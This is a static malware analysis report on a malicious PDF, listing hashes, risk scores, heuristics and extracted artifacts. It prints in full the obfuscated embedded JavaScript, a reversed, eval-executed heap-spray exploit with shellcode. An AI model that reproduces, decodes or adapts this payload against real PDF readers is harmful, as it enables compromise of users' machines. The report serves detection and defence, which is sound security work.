Malicious PDF — malware analysis report

Static analysis result for SHA-256 43e69f296324782a…

MALICIOUS

PDF

68.7 KB First seen: 2026-05-11
MD5: b564eb8e1f4f1bcc39dd4e507b6b584d SHA-1: 14049db364aac092cbe495da6b931d776511b30e SHA-256: 43e69f296324782a614d1540b224c4e5225deac170738a885d72eb5fad978335
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. This script, named 'javascript_obj0012_000.js', is likely designed to download and execute a second-stage payload from the embedded URL http://www.bitstream.com. Note, however, that this URL was extracted from the PDF document text rather than from the script itself (see the Embedded URL finding below), so the download behaviour is an inference and is not confirmed by the extracted code. The script preview shows a reversed, string-built payload that is reassembled and executed at runtime through a dynamically constructed function, which is consistent with the eval/decoder token and the heap-spray/shellcode indicators reported on the extracted artifacts. The ASCIIHexDecode filter also suggests potential exploit activity within the PDF structure.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 5

  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3724 bytes
SHA-256: 78bab42ea050c9d2a12931eade2d98c996aa7c4040b068f89e657a45642a0857
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split("").join(""));
       var s='
 ;"s"+dD=]M[nBR )++M;0f1x0<M;0=M( rof ;)(yarrA wen = nBR rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.Sklja = dD ;Sklja =+ Sklja )00008x0 < htgnel.Sklja(elihw ;)2/63556 ,0(gnirtsbus.VMUrM = Sklja ;Ri =+ VMUrM ;ew =+ VMUrM ;)2/)42x0-c0c0x0( ,0(gnirtsbus.Ri = VMUrM ;Ri=+Ri )63556 < 8 + 02 + htgnel.Ri( elihw ;) "c" + "0" + "c" + "0" + "u%" + "c" + "0" + "c" + "0" + "u" + "%" (ssaU = Ri rav ;) 'bb14  u % ca26  u % 2ae8  u % 407c  u % b4be  u % 69b1  u % 8246  u % 6990  u % 607b  u % 58b5  u % ae5c  u % 8bbd  u % e90c  u % b33c  u % b683  u % 2004  u % cbaf  u % e5fb  u % 427a  u % 6b6d  u % 56d8  u % 93c9  u % ea8a  u % e330  u % 5272  u % 5523  u % a170  u % 5582  u % f1e3  u % 2889  u % d305  u % 65e9  u % 532b  u % 9eb3  u % 52ac  u % 6020  u % c7e6  u % c5b1  u % 8552  u % 60c3  u % 77ca  u % d89b  u % bf09  u % a045  u % 39c8  u % dbe1  u % 0de7  u % 8674  u % 3ff7  u % a9fd  u % ee7d  u % c3a4  u % 514a  u % 1894  u % dd75  u % e5a3  u % 99f6  u % 3522  u % 6ae5  u % b6d6  u % 54f6  u % 9bc1  u % dac6  u % c87a  u % 0552  u % f53b  u % 0641  u % 3dbe  u % 62ce  u % a7c5  u % 42cb  u % d85e  u % 10a7  u % dad9  u % dcde  u % d6c9  u % 8bfa  u % ebb6  u % fe0a  u % d493  u % 6acb  u % 8383  u % 6937  u % be7d  u % ae96  u % 725b  u % 225a  u % 6907  u % 3fa8  u % d15b  u % bd56  u % 687b  u % 57d4  u % 56c3  u % dff1  u % 438e  u % 68a4  u % 50ab  u % f0fa  u % 4f9d  u % cef4  u % 81c8  u % 3033  u % aecf  u % e038  u % 1324  u % 4fa5  u % 4742  u % ec9d  u % 339d  u % 9c1b  u % 9113  u % 21e6  u % 8b17  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 
be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % ' (ssaU = ew rav ;epacsenu = ssaU rav 
';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)